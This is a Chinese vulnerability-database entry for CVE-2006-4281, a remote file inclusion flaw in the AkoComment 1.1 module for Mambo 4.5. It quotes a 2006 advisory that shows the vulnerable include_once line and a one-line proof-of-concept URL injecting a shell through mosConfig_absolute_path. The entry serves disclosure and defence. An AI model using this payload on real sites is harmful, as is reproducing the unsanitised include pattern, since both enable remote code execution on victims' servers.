Mambo AkoComment模块mosConfig_absolute_path参数远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193773 漏洞类型 输入验证
发布时间 2006-08-21 更新时间 2006-08-26
CVE编号 CVE-2006-4281 CNNVD-ID CNNVD-200608-334
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006080144
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-334
|漏洞详情
Mambo4.5的AkoComment1.1模块(com_akocomment)中akocomments.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助mosConfig_absolute_path参数中的URL执行任意PHP代码。
|漏洞EXP
		########################################################################
###################

#			Aria-Security.net Advisory                                        #

#			Discovered  by: O.U.T.L.A.W                                       #

#			< www.Aria-security.net >                                      	  #

#		Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                      	  #

#		                                  		    			  #

########################################################################
###################

#Software:   	Ako Comments (mod)

#Attack method: Remote File Inclusion

#Source:

#Description: This module shows users' comments from component AkoComments.

#File Version: 1.1 for Mambo 4.5

include_once($mosConfig_absolute_path.'/components/com_akocomment/langua
ges/'.$mosConfig_lang.'.php');

************************************************************************
************

#Proof of Concept:

#http://www.site.com/akocomments.php?mosConfig_absolute_path=shell

#

#----------------------------------------------------------

#

#

#Contact : Outlaw (at) aria-security (dot) net [email concealed]
|参考资料

来源:XF
名称:akocomment-akocomments-file-include(28458)
链接:http://xforce.iss.net/xforce/xfdb/28458
来源:BID
名称:19602
链接:http://www.securityfocus.com/bid/19602
来源:BUGTRAQ
名称:20060819AkoComments(mod)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/443748
来源:SREASON
名称:1435
链接:http://securityreason.com/securityalert/1435